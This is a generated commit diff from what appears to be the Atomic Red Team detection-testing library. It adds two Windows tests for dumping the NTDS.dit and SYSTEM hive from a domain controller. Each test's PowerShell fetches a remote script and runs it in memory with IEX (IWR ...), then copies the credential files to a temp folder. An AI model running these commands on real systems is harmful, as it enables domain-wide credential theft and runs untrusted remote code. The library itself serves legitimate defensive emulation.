Generated docs from job=generate-docs branch=master [ci skip]

2026-02-13 02:45:07 +00:00
parent 02e4420bc0
commit e17202c34c
12 changed files with 160 additions and 16 deletions
@@ -1838,6 +1838,8 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
+credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1262,6 +1262,8 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
+credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -2519,6 +2519,8 @@
  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
+  - Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
+  - Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
  - Atomic Test #1: Request for service tickets [windows]
  - Atomic Test #2: Rubeus kerberoast [windows]
@@ -1778,6 +1778,8 @@
  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
+  - Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
+  - Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
  - Atomic Test #1: Request for service tickets [windows]
  - Atomic Test #2: Rubeus kerberoast [windows]
@@ -98881,6 +98881,62 @@ credential-access:
          diskshadow.exe /s #{filename}
        name: command_prompt
        elevation_required: true
+    - name: Copy NTDS in low level NTFS acquisition via MFT parsing
+      auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+    - name: Copy NTDS in low level NTFS acquisition via fsutil
+      auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
  T1558.003:
    technique:
      type: attack-pattern
@@ -80301,6 +80301,62 @@ credential-access:
          diskshadow.exe /s #{filename}
        name: command_prompt
        elevation_required: true
+    - name: Copy NTDS in low level NTFS acquisition via MFT parsing
+      auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+    - name: Copy NTDS in low level NTFS acquisition via fsutil
+      auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
  T1558.003:
    technique:
      type: attack-pattern
@@ -36,9 +36,9 @@ The following tools and techniques can be used to enumerate the NTDS file and th

 - [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)

- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing)
+- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---copy-ntds-in-low-level-ntfs-acquisition-via-mft-parsing)

- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---Copy-NTDS-in-low-level-NTFS-acquisition-via-fsutil)
+- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---copy-ntds-in-low-level-ntfs-acquisition-via-fsutil)


 <br/>
@@ -465,21 +465,33 @@ mkdir c:\exfil
 diskshadow.exe /s #{filename}
 ```

-<br/>


+
+
+
+<br/>
+<br/>
+
 ## Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing
 This test is intended to be run on a domain Controller.
+
 UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).

 **Supported Platforms:** Windows


+**auto_generated_guid:** f57cb283-c131-4e2f-8a6c-363d575748b2
+
+
+
+
+
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|
-
+| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
+| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -487,12 +499,11 @@ UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping

 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+IEX (IWR #{script_url} -UseBasicParsing)
 Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
 Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
 ```

-
 #### Cleanup Commands:
 ```powershell
 remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
@@ -500,22 +511,31 @@ remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
 ```


+
+
+
+<br/>
 <br/>
-
-

 ## Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil
 This test is intended to be run on a domain Controller.
+
 UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).

 **Supported Platforms:** Windows


+**auto_generated_guid:** c7be89f7-5d06-4321-9f90-8676a77e0502
+
+
+
+
+
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|
-
+| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
+| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -523,12 +543,11 @@ UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping

 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+IEX (IWR #{script_url} -UseBasicParsing)
 Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
 Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
 ```

-
 #### Cleanup Commands:
 ```powershell
 remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
@@ -538,4 +557,5 @@ remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue



+
 <br/>
@@ -262,6 +262,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true
 - name: Copy NTDS in low level NTFS acquisition via MFT parsing
+  auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
  description: |
    This test is intended to be run on a domain Controller.

@@ -290,6 +291,7 @@ atomic_tests:
      remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue

 - name: Copy NTDS in low level NTFS acquisition via fsutil
+  auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
  description: |
    This test is intended to be run on a domain Controller.

@@ -1795,3 +1795,5 @@ b4773c6b-3aa0-44a2-830a-b6ff594a0fb2
 a58c066d-f2f0-42a2-ab70-30af73f89e66
 28ca4f81-fa96-47ff-8555-dde98017e89b
 6e78084a-a433-4702-a838-cc7b765d87e8
+f57cb283-c131-4e2f-8a6c-363d575748b2
+c7be89f7-5d06-4321-9f90-8676a77e0502